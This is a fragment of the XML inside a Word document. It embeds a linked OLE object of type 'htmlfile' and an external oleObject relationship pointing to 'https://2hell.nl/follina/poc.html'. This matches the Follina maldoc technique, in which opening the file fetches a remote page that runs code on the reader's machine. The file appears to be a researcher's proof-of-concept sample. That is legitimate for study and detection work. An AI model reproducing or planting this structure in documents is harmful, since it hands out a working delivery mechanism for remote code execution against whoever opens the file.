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A9D4" w14:textId="288958D0" w:rsidR="00DA49F2" w:rsidRPr="00EE2BC3" w:rsidRDefault="0007443F" w:rsidP="00EE2BC3">
      <w:r>
        <w:object w:dxaOrig="4320" w:dyaOrig="4320" w14:anchorId="0457A9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75pt;height:3.75pt" o:ole=""/>
          <o:OLEObject Type="Link" ProgID="htmlfile" ShapeID="_x0000_i1025" DrawAspect="Content" r:id="rId4" UpdateMode="OnCall">
            <o:LinkType>EnhancedMetaFile</o:LinkType>
            <o:LockedField>false</o:LockedField>
            <o:FieldCodes>\f 0</o:FieldCodes>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00DA49F2" w:rsidRPr="00EE2B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45A"/>
    <w:rsid w:val="0007443F"/>
    <w:rsid w:val="006D7E96"/>
    <w:rsid w:val="00B5245A"/>
    <w:rsid w:val="00DA49F2"/>
    <w:rsid w:val="00EE2BC3"/>
    <w:rsid w:val="00F45728"/>
    <w:rsid w:val="00F9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69A0E7F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B14D40A3-F756-47A2-BC78-3C2C7C327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oleObject" Target="https://2hell.nl/follina/poc.html!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KIS2</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Daniel Card</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-25T13:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-30T08:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>